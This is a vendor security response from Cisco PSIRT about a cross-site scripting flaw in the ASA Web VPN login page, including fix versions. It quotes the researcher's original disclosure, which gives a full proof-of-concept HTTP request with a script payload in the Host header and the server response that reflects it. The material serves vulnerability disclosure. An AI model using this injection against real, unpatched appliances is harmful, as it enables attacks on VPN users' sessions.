This is the Cisco PSIRT response to an issue discovered and reported to Cisco by Bugs NotHugs regarding a cross-site scripting vulnerability in the Cisco Adaptive Security Appliance (ASA) clientless SSL VPN feature. Cisco PSIRT greatly appreciates the opportunity to work with researchers on security vulnerabilities, and welcomes the opportunity to review and assist in product reports. PSIRT would like to thank Bugs NotHugs for reporting this issue to us. Cisco has release an IntelliShield Alert on this vulnerability, which is available at: http://tools.cisco.com/security/center/viewAlert.x?alertId=17950. This and other IntelliShield Alerts are available off the Cisco Security Center (www.cisco.com/security). Cisco is currently patching this vulnerability as Cisco bug ID CSCsy82093 and the fixes will be available in 8.0.3.31, 8.1.2.22, and 8.2.0. These images will soon be available for download at either http://www.cisco.com/cgi-bin/tablebuild.pl/asa or http://www.cisco.com/cgi-bin/tablebuild.pl/asa-interim. To check on the latest versions with fixed releases please consult the Cisco Bug Toolkit http://tools.cisco.com/Support/BugToolKit/action.do?hdnAction=searchBugs . -----Original Message----- From: Bugs NotHugs [mailto:bugsnothugs@xxxxxxxxx] Sent: Tuesday, March 31, 2009 6:18 AM To: bugtraq; fd Subject: Cisco ASA5520 Web VPN Host Header XSS - Cisco ASA5520 Web VPN Host Header XSS - Description Cross-site scripting. - Product Cisco, ASA5520, IOS 7.2(2)22 - PoC Modified request: POST /+webvpn+/index.html HTTP/1.1 Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv="" content='"www.owasp.org Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://198.133.219.23/+webvpn+/index.html Accept-Language: en-us Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032) Connection: Keep-Alive Cache-Control: no-cache Cookie: webvpnlogin=1 Content-Length: 66 username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset= Response: HTTP/1.1 200 OK Server: Virata-EmWeb/R6_2_0 Content-Type: text/html Cache-Control: max-age=0 Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/ Set-Cookie: webvpnlogin=1 Content-Length: 5556 <html> <!-- Copyright (c) 2004, 2005 by Cisco Systems, Inc. All rights reserved. --> <head> <META http-equiv="PICS-Label" content='(PICS-1.1 "http://www.rsac.org/ratingsv01.html"; l gen true comment "RSACi North America Server" for "http://";'><script>alert('BugsNotHugs')</script><meta httpequiv="" content='"www.owasp.org/+webvpn+/index.html" on "2000.11.02T23:36-0800" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Window-target" content="_top"> <title>WebVPN Service</title> - Solution None - Timeline 2007-09-17: Vulnerability Discovered 2008-02-15: Disclosed to Vendor (auto-reply) 2009-04-02: Disclosed to Public (XSS is so 1999) -- BugsNotHugs Shared Vulnerability Disclosure Account
